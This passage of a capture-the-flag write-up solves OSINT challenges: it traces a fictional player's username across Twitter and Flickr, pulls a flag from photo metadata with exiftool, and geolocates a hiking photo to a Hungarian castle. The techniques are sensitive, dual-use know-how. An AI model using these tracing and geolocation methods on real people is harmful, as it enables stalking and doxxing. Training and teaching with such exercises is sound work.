[+] Xbox Gamertag: https://xboxgamertag.com/search/r34L1337
[+] eune.op.gg: https://eune.op.gg/summoner/userName=r34L1337
100%|██████████████████████████████████| 1515/1515 [00:49<00:00, 30.55it/s]
```

- Twitter profiles are always interesting since twitter is a big social media sharing platform compared to the others listed above.

Let's take a look at it!

- [twitter.com/r34L1337](https://twitter.com/r34L1337)

![pl4y3r_twitter](img/pl4y3r_twitter.png)

There are some tweets BUT **did you notice the other tab** on the cat screenshot?

![pl4y3r_tabs.jpeg](img/pl4y3r_tabs.jpeg)

- If you know flickr you know that favicon :D  
    Otherwise, you can make yandex reverse image search for it. I'm saying yandex because it's far more accurate than google or bing.  
    ![pl4y3r_favico.png](img/pl4y3r_favico.png)  
    ![pl4y3r_favico_found.png](img/pl4y3r_favico_found.png)
- Flickr name is `th4t550m3 r34l5h17`

Since this name contains a space and flickr username search works a little differently we must do it the manual way.

- [flickr.com/search/people/?username=th4t550m3%20r34l5h17](https://www.flickr.com/search/people/?username=th4t550m3%20r34l5h17)

![pl4y3r_flickr.png](img/pl4y3r_flickr.png)

If we click the userprofile we get redirected to:

- [flickr.com/photos/191661694@N02](https://www.flickr.com/photos/191661694@N02)
- This is a random hash and that's the reason why sherlock / maigret aren't working properly with flickr

There is only one image that we can download! It's always best to download in **original size**!

![pl4y3r_flickr_dow.png](img/pl4y3r_flickr_dow.png)

Downloaded file: [pl4y3r_flickr_doge.png](chall/pl4y3r_flickr_doge.png)

![pl4y3r_flickr_doge.png](chall/pl4y3r_flickr_doge.png)

*Did you know that flickr does **NOT** purge metadata out of uploaded pictures by default?*

Yes, it's time to go back to our stego basics and use `exiftool` again on the downloaded picture :D

```
$ exiftool chall/pl4y3r_flickr_doge.png
ExifTool Version Number         : 12.13
File Name                       : pl4y3r_flickr_doge.png
Directory                       : chall
File Size                       : 855 KiB
File Modification Date/Time     : 2021:01:17 20:55:35+01:00
File Access Date/Time           : 2021:01:17 20:55:35+01:00
File Inode Change Date/Time     : 2021:01:17 20:55:59+01:00
File Permissions                : rw-r--r--
File Type                       : PNG
File Type Extension             : png
MIME Type                       : image/png
Image Width                     : 908
Image Height                    : 872
Bit Depth                       : 8
Color Type                      : RGB with Alpha
Compression                     : Deflate/Inflate
Filter                          : Adaptive
Interlace                       : Noninterlaced
Copyright                       : flag{w0w_u_tr4ck3d_m3_d0wn}
Exif Byte Order                 : Big-endian (Motorola, MM)
X Resolution                    : 72
Y Resolution                    : 72
Resolution Unit                 : inches
Y Cb Cr Positioning             : Centered
Exif Version                    : 0232
Date/Time Original              : 6969:01:01 16:00:00
Components Configuration        : Y, Cb, Cr, -
Flashpix Version                : 0100
Color Space                     : Uncalibrated
Image Size                      : 908x872
Megapixels                      : 0.792
```

- It's in the `Copyright` field now :D
    
```
Copyright : flag{w0w_u_tr4ck3d_m3_d0wn}

flag{w0w_u_tr4ck3d_m3_d0wn}
```

## 1337h1k3r - 500 - By ~\M4t35Z

> Image geolocation challenge. I shot some dope pictures while hiking with my friends last year in Hungary.

> From which castle I took the picture?

> Flag format(spaces replaced by \_ + no umlauts): flag{hungarian\_name\_of\_the\_castle}

File: [20201027_133833.jpg](chall/20201027_133833.jpg)

![20201027_133833.jpg](chall/20201027_133833.jpg)

It's an IMINT challenge! We have to geolocate this image!

Taking a closer look, noting down the landmarks. Let's open the file in GIMP and mark these interesting spots.

![1337h1k3r_landmarks.jpg](img/1337h1k3r_landmarks.jpg)

I marked some extra things like the main shadow of the creator and the shape of houses in the back.

![1337h1k3r_landmarks_sun](img/1337h1k3r_landmarks_sun.jpg)

Did you notice the filename? `20201027_133833.jpg`?
The image was taken at `2020-10-27 13:38:33`.  
There are some shadows on the picture so we know the directions!
This means the picture is facing north.

Then we have to search and search until we find something that matches what we saw before.

![1337h1k3r_google.png](img/1337h1k3r_google.png)

- This shape seems similar

- [www.origo.hu/kultura/20150828-magyar-varak-kastelyok-33-milliard-forint-felujitas.html](https://www.origo.hu/kultura/20150828-magyar-varak-kastelyok-33-milliard-forint-felujitas.html)

The name of the castle isn't mentioned but we can right-click on the picture and click `View Image`.
In some cases, webdevs/authors keep the original filename of the downloaded photo.

- [cdn.nwmgroups.hu/s/img/i/1508/20150828magyar-varak-somosko.jpg?w=800&h=533&t=5](https://cdn.nwmgroups.hu/s/img/i/1508/20150828magyar-varak-somosko.jpg?w=800&h=533&t=5)

> ...**somosko**.jpg

![1337h1k3r_somosko](img/1337h1k3r_somosko.jpg)

Yess, it happened again! Now we know the name of the other castle in our target image.

We can confirm it by opening its wikipedia page:

- [hu.wikipedia.org/wiki/Somosk%C5%91i_v%C3%A1r](https://hu.wikipedia.org/wiki/Somosk%C5%91i_v%C3%A1r)

There is an image of the castle and the surrounding village:

- [https://upload.wikimedia.org/wikipedia/commons/thumb/f/f7/The_castle_Somosk%C5%91_and_the_village.jpg/1920px-The_castle_Somosk%C5%91_and_the_village.jpg](https://upload.wikimedia.org/wikipedia/commons/thumb/f/f7/The_castle_Somosk%C5%91_and_the_village.jpg/1920px-The_castle_Somosk%C5%91_and_the_village.jpg)

![1337h1k3r_somosko_kornyek.jpg](img/1337h1k3r_somosko_kornyek.jpg)

I marked the shapes of the castle and the village and it matches the original picture!

![1337h1k3r_somosko_match.png](img/1337h1k3r_somosko_match.png)

Since the challenge mentions the flag is a name of a hungarian castle we just need to find one near Somosko.

If we open up google maps and pan around a little bit we will eventually find `Salgo Vara` on the map!

![1337h1k3r_salgo_vara_gmaps.png](img/1337h1k3r_salgo_vara_gmaps.png)

Looking at the pictures and street view of it you'll notice the cobblestone in the wall and Somosko in the background which means you found the correct castle!

![1337h1k3r_location_confirmed.png](img/1337h1k3r_location_confirmed.png)

- - -

I hope you enjoyed both 13374C4D3MY ctf and my writeups for the challenges!

You can always follow me on [twitter.com/szilak44](https://twitter.com/szilak44)
